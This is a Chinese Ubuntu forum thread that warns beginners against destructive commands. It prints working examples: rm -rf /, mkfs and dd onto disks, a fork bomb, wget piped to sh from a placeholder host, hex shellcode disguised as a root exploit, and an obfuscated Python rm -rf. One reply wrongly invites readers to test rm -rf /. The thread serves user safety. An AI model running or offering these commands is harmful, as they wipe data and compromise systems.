请不要执行如下类似命令--Ubuntu危险命令
-
- 帖子: 84
- 注册时间: 2007-08-28 1:52
- 联系:
-
- 帖子: 45
- 注册时间: 2007-05-11 16:51
- fengluo
- 帖子: 11
- 注册时间: 2007-04-09 21:35
- 联系:
我把它翻译在我的博客上
翻译的不是很好……将就一下啦
--------------------------------------------------------------------------------------
删除所有文件,删除当前目录及删除当前目录下的可见文件。这些命令运行危险的原因很明显。
代码:
格式化:运行mkfs命令后磁盘上的数据将被摧毁并且替换为空白的文件系统。
代码:
块设备操作:将成行的数据写入块设备中。数次这样的操作将可能摧毁文件系统并且引起所有数据的丢失。
代码:
Forkbomb:运行大量的进程直到系统崩溃,强制你强行重启将可能导致出错,数据损坏或者其他糟糕的事情发生。
在Bourne-ish shells中,比如bash:(这东西看起来很有意思很吸引人去这么试一把)
代码:
在Perl中
代码:
Tarbomb:有人会让你释放一个tar存档到一个已存在的目录中。这个tar存档可能爆出无数个文件或者把文件靠猜测的文件名注入到系统中。你应该养成释放tar到干净目录中的习惯。
shellscript:有人给你一个链接到一个shellscript运行。这可能包含他选择的任何命令——无害的或者恶意的。不要运行从你不认识的人那个发来的代码。(我经常这么干……–!中国人还是很善良的……)
代码:
代码:
编译代码:
有人会给你源代码然后让你编译它。在一大堆源代码中很可能隐含恶意代码,并且源代码能给予攻击者更多的机会。不要编译或运行编译好了的代码除非那些源代码是知名的软件,或者从一个受好评的站点那里的来的(比如SourceForge, the author’s homepage, an Ubuntu address)。
很经典的例子就是表面上伪装成邮件实际上是proof of concept 执行sudo 声称如果你运行它,你不需要shell就可以使用sudo获得root权限。
代码:
对于新用户及经验较浅的用户,这个看起来像“十六进制乱码”是个典型proof-of-concept.可是这个代码实际上确是运行的是rm -rf ~ / &,将会以一个常规用户或root破坏你home文件夹或所有文件。如果你能读懂这个十六进制形式的命令,那么你就不需要看这则公告了。否则,请记住当心那些很长的代码。
另外,再次强调这些不是所有的东西,你不应该把它当作一个检查一个命令是否安全的列表。
比如,在python中生成这样的东西:
代码:
这里”sn!.sg!+”就是rm -rf*另一种字符形式。当然这仅仅只是个愚蠢例子——我不会期望有人会蠢到毫无顾忌的把它贴到终端中运行。
翻译的不是很好……将就一下啦
--------------------------------------------------------------------------------------
删除所有文件,删除当前目录及删除当前目录下的可见文件。这些命令运行危险的原因很明显。
代码:
代码: 全选
rm -rf /
rm -rf .
rm -rf *
代码:
代码: 全选
mkfs
mkfs.ext3
mkfs.anything
代码:
代码: 全选
any_command > /dev/sda
dd if=something of=/dev/sda
在Bourne-ish shells中,比如bash:(这东西看起来很有意思很吸引人去这么试一把)
代码:
代码: 全选
:(){:|:&};:
代码:
代码: 全选
fork while fork
shellscript:有人给你一个链接到一个shellscript运行。这可能包含他选择的任何命令——无害的或者恶意的。不要运行从你不认识的人那个发来的代码。(我经常这么干……–!中国人还是很善良的……)
代码:
代码: 全选
wget http://some_place/some_file
sh ./some_file
代码: 全选
wget http://some_place/some_file -O- | sh
有人会给你源代码然后让你编译它。在一大堆源代码中很可能隐含恶意代码,并且源代码能给予攻击者更多的机会。不要编译或运行编译好了的代码除非那些源代码是知名的软件,或者从一个受好评的站点那里的来的(比如SourceForge, the author’s homepage, an Ubuntu address)。
很经典的例子就是表面上伪装成邮件实际上是proof of concept 执行sudo 声称如果你运行它,你不需要shell就可以使用sudo获得root权限。
代码:
代码: 全选
char esp[] __attribute__ ((section(”.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;
另外,再次强调这些不是所有的东西,你不应该把它当作一个检查一个命令是否安全的列表。
比如,在python中生成这样的东西:
代码:
代码: 全选
python -c ‘import os; os.system(”".join([chr(ord(i)-1) for i in “sn!.sg!+”]))’
- ljj_jjl2008
- 论坛版主
- 帖子: 14255
- 注册时间: 2007-09-16 8:29
-
- 帖子: 28
- 注册时间: 2007-06-10 1:41
Re: 请不要执行如下类似命令--Ubuntu危险命令
初学者不要光到网上瞎搜,有空拿linux的书看一下 就会明白的,
我也在看书,不过就我看的那点书而言,上面的几个傻猫命令我一看就知道什么意思,是绝对不会去干滴。
所以建议大家是得好好学习,学习了就没这些事了
我也在看书,不过就我看的那点书而言,上面的几个傻猫命令我一看就知道什么意思,是绝对不会去干滴。
所以建议大家是得好好学习,学习了就没这些事了
- BigSnake.NET
- 帖子: 12522
- 注册时间: 2006-07-02 11:16
- 来自: 廣州
- 联系:
- roy0524
- 帖子: 125
- 注册时间: 2007-11-20 21:42
yiding_he 写了:喂,那些说明文字还是要翻译一下的啦。
cnbeta 上的牛人马上就找出来了:《Running rm -rf / on Linux》
http://www.youtube.com/watch?v=D4fzInlyYQo
如果不知道运行 rm -rf / 的后果,看看这里吧。
怎么我只能看到前面三秒?下面就不会动了?
- stlxv
- 论坛版主
- 帖子: 8275
- 注册时间: 2006-05-03 0:39
- 来自: المريخ
我试过了,在我的ubuntu上马上出错退出了,啥都好好的。 我相信任何没有被修改过的ubuntu都是这样的:roll:zgsfriend 写了:你可能没有执行过,当时我是想删一个root权限的文件,在末尾不知怎么把/给加上了,当时用的是7.04幸亏没安ntfs-3g,在删除我windows时提醒权限不够,我及时ctrl+c停止了才得以包留住一部分(那时我还装了红旗5,剩余的文件是用他看见的),后来就无法进入ubuntu了只有重装。stlxv 写了:这个几乎不会删除什么东西.......zgsfriend 写了:我曾经无意中执行过 sudo rm /
结果,呵呵重装系统了
这些东西还是注意点好
若你不相信可以去试试。呵呵,不要说我误导。
上次由 stlxv 在 2007-12-02 19:58,总共编辑 1 次。
PHP是最好的语言!不服来战!